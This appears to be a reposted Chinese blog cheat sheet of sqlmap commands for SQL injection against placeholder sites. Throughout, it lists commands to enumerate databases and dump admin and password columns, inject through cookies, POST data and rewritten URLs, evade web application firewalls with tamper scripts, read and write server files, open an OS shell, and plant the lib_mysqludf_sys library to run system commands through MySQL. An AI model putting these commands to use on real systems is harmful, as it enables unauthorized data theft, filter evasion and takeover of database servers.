sqlmap运行mysql命令_sqlmap命令总结

sqlmap运行mysql命令_sqlmap命令总结Sqlmap 常规命令 sqlmap u http www xxx com shownews asp id 1 tables 获取表 sqlmap u http www xxx com shownews asp id 1 columns T 表 获取指定表字段内容 sqlmap u http www xxx com shownews asp id 1 du

Sqlmap常规命令:

sqlmap -u “http://www.xxx.com/shownews.asp?id=1” –-tables (获取表)

sqlmap-u “http://www.xxx.com/shownews.asp?id=1” –-columns -T 表 (获取指定表字段内容)

sqlmap-u “http://www.xxx.com/shownews.asp?id=1” –-dump -C “admin,password” -T 表 (下载指定数据)

MYSQL(多个数据库):

sqlmap -u “http://www.xxx.com/shownews.php?id=1” –-dbs (获取数据库)

sqlmap-u “http://www.xxx.com/shownews.asp?id=1” –-current -db (获取当前网站数据库)

sqlmap-u “http://www.xxx.com/shownews.asp?id=1” –-tables -D “数据库”(获取指定数据库表)

sqlmap-u “http://www.xxx.com/shownews.asp?id=1” –-columns -T “表” -D “库”(获取指定字段内容)

sqlmap-u “http://www.xxx.com/shownews.asp?id=1” –-dump -C “admin,password” -T “表” -D “库”(下载指定数据)

Cookie注入:

sqlmap -u “http://www.xxx.com/shownews.asp?” –-cookie “id=1” –-level 2

POST注入:

包括两个方面,-r参数注入 – -data参数注入

两者区别根据具体情况选择

-r:用burp抓包保存为1.txt在sqlmap根目录,一般登陆框利用较多

sqlmap.py -r “1.txt”

–data:直接利用参数即可

sqlmap -u “http://www.xxx.com/shownews.asp?” –-data= “id=1”

伪静态注入:在存在注入的地方加上*,然后获取数据库

sqlmap.py -u “http://www.xx.com/index.php/index/view/id/40*.html” –-dbs

Sqlmap代理:

HTTP(S)代理:

参数:–proxy、–proxy-cred、–proxy-file和–ignore-proxy

使用参数”–proxy”来设置一个HTTP(S)代理,格式是”http(s)://url:port”。若代理需要认证,使用参数”–proxy-cred”来提供认证凭证,格式是”username:password”。

如:

sqlmap -u “http://www.xxx.com/shownews.asp?id=1” –-dbs –-proxy http://192.168.0.1:1080

–proxy-file:加载代理ip列表

如:

sqlmap.py -u”http://www.xxx.com/shownews.asp?id=1″ –proxy-file=dl.txt(代理ip文件)

–ignore-proxy:忽略本地代理设置

–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理

Tor代理模式:这个没试过,就不贴语法了。

Sqlmap的tamper过waf脚本整理:

sqlmap有着两个选项 –identify-waf 和 –check-waf  来辨认waf

注:自己常用的脚本

space2morehash.py space2hash.py(绕过过滤‘=’) base64encode.py(用base64编码替换)

charencode.py space2comment.py charunicodeencode.py(字符串unicode编码) chardoubleencode.py(双url编码)unmagicquotes.py(宽字符绕过 GPC addslashes) randomcomments.py(用//分割sql关键字) appendnullbyte.py(在有效负荷结束位置加载零字节字符编码)

Tamper语法:

batch:要求不对目标写入(碰到任何提示默认回车)

tamper:使用干预脚本

-v 3(3为等级)

注意:若不使用3等级无法继续下一步操作。

语法:sqlmap.py -u “http://www.xxx.com/shownews.asp?id=1” -v 3 –dbs –batch –tamper “space2morehash.py”

注意:mysql access等数据库的tamper脚本还是有所区别的

带上一个大佬整理的各个数据库对应的tamper脚本链接

https://blog.csdn.net/hxsstar/article/details/

Sqlmap之请求延迟:

Sqlmap.py -u “http://www.xxx.com/shownews.asp?id=1” –tables –delay 0.5(延迟时间)

如果有网站dba权限,且可以读取写入文件,那么可以直接os-shell或者以下命令

– -file-read /home/www/index.php 读取指定文件

– -file-write 写入本地文件(- -file-write “c:\test\1.txt” – -file-dest “/home/www/feizhu.txt” 本地的1.txt文件写入到远程服务器feizhu.txt(此处需要有网站写入权限)

sqlmap连接数据库:

1.sqlmap连接mysql数据打开一个交互shell(远程数据库主机必须允外连才可以)

sqlmap.py -d mysql://root:lraewBxk@127.0.0.1:3306/test –sql-shell

select @@version;

select @@plugin_dir;

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录(远程数据库主机必须允外连才可以)

sqlmap.py -d mysql://root:lraewBxk@127.0.0.1:3306/test –file-write=d:/tmp/lib_mysqludf_sys.dll –file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME ‘lib_mysqludf_sys.dll’

CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘lib_mysqludf_sys.dll’

select sys_eval(‘ver’);

sqlmap其他:

sqlmap.py -r 1.txt –dump -T orders -D www_data –start 2 –stop 4 -v 0 //导出www_data数据库中orders表第2条到第4条之间所有字段的数据

sqlmap.py -r 1.txt –sql-query “SELECT count(*) FROM www_data.orders” -v 1 //查询www_data数据库中orders表数据总数

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/225295.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月17日 上午9:38
下一篇 2026年3月17日 上午9:38


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号